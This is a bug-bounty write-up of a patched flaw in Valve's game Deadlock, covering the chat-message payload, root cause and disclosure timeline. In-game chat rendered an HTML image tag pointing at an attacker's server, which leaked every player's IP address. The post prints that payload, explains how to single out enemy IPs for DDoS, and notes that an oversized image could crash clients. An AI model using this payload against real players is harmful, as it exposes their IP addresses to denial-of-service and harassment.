Deadlock - Player IP address disclosure of the entire lobby


tl;dr - a specific Deadlock message would IP grab everyone in the lobby :^)

thanks oranges

Valve paid $1500 for the bug report however Deadlock is not in scope for their program

if you want to read a more professionally written post, check out my other post on Happy Little Accidents, a research group that helped me write the report to Valve

what’s Deadlock?

Deadlock is a game made by Valve currently in closed beta but you can invite unlimited friends to the beta if you have it so it’s pretty popular

how do you do it?

by sending <img src="YOUR_SERVER"> within a chat message in Deadlock to the in-game all-chat, the client of anyone connected to the server would make an HTTP request to your server giving you their IP address

the message ingame

pretty strange seeing as the image tags don’t render

what can you do with this?

you could just DDoS the enemy team

the message could be sent once in the team-only chat, and then once into the all-chat, resulting in enemy team IP addresses being deduced by checking which IP addresses showed up twice

demo?

sorry it’s very low resolution, the following gif shows me grabbing my own IP through the exploit, and shows the resulting HTTP request in my Blurp instance:

demo

why does this work?

Valve’s Panorama UI framework layout files are stored in XML. when investigating with Rolly, from our understanding, html="true" is used to dictate whether or not text within the element is attempted to be rendered. the following screenshot shows the GitHub commit (found on SteamDB’s Deadlock game tracker, look for file citadel_hud_playerintents_player.xml) in which this attribute was removed from the chat layout file, patching the exploit:

the GitHub commit

anything else?

the build description field was also vulnerable, and the username field was also vulnerable and would trigger requests occasionally but i couldn’t narrow down where it was being triggered from. this field was marked as a duplicate when we reported it

i also noticed that you could load a 10gb+ image which would cause spikes in internet traffic before the download was dropped, and in some cases, this would crash the game client.

all fields have now been patched

after the payout but before publishing this write-up, a similar HackerOne report (shoutout wa) was brought to my attention which seems to confirm our reasoning for why this bug happens. the report is for a similar cross-site scripting vulnerability leading to remote code execution, however, as we could not get images to render, i don’t believe RCE was possible through the in-game messages, as the image tags did not render properly. however, as the build menu description tags seemed to render it is possible that RCE could have been achieved through the vulnerable build menu description field but i cant confirm this. would have taken a lot of steps to get a victim to view the vulnerable field, and the build description field we reported was marked as a duplicate so we wouldn’t have gotten any money, but it still would have been cool to see it in action :( 2025 update: Valve eventually reintroduced this bug, and i tested out if RCE was possible, it was extremely sandboxed and i couldn’t get anything out of it

timeline

Itz-d0dgy completely carried the reporting and triage process as I had never done anything like this before, we reported it to Valve’s bug bounty program with HackerOne. the timeline with Valve is as follows:

  • August 22: Bug found and disclosed to Valve through HackerOne

  • August 23: HackerOne responds asking for details on the asset (deadlock wasnt in public beta yet), we respond with detail

  • August 27: HackerOne asks for video PoC, PoC provided

  • August 29: HackerOne informs that this is being discussed internally with the Valve team

  • September 1: The less impactful vulnerable field is patched

  • September 10: We are thanked for the report and told the Deadlock team was already aware at the time we filed the report, we ask for clarification as the more impactful vulnerable field is still vulnerable. Report is marked as a duplicate.

  • September 13: Follow up asking for clarification as one issue is not patched

  • September 16: Follow up additionally inquiring for public disclosure

  • October 9: Follow up on if both issues were known and if we can publish disclose publicly

  • October 11: The major vulnerable field is seemingly patched (as seen in the GitHub commit mentioned earlier)

  • October 12: Another follow up asking if we can disclose this publicly

  • October 15: Report is reopened;

    • “Two bugs in this issue; one was a dup, the other is not.”.
    • “Deadlock is not in scope in our program; however this issue was interesting, and the team took action to mitigate, so we are issuing a bounty.”
    • Additional thanks for the report
    • We ask if we are able to request a CVE for this issue

Valve also mentioned in an email:

This game is in an unusual position right now. Obviously the game has a lot of players in its playtest, which is what makes reports like the one you filed interesting. But, the game is not public, and the game team is not comfortable adding it to our bug bounty program yet. The issue is interesting enough that we are going to issue a bounty for the second issue in the report. But we wanted to let you know that this does not mean Deadlock is fully supported on Valve's bounty program.

  • October 21: We ask for a follow-up on the CVE request, request for publish disclosure and notice that as per HackerOne policy this will be publicly disclosed if no objection is raised within 30 days of the request

  • December 16: Still no response on CVE request and blog posts published

thanks to:

  • Itz-d0dgy (Jack Moran)

helped so much with reporting and following up with Valve, helped me realize that this wasn’t just like SSRF like i thought it was and that the IP the request came from was my real IP (i just moved to a new place and didn’t recognize it), helped me find the source of the original request when i couldn’t find where it had come from

  • Rolly (Conrad Draper)

investigated why <img> tags worked and <script> tags didn’t

  • Valve

for paying $1500usd for an out-of-scope vulnerability where i just typed image tags in chat, please remember what they said, “this does not mean Deadlock is fully supported on Valve’s bounty program”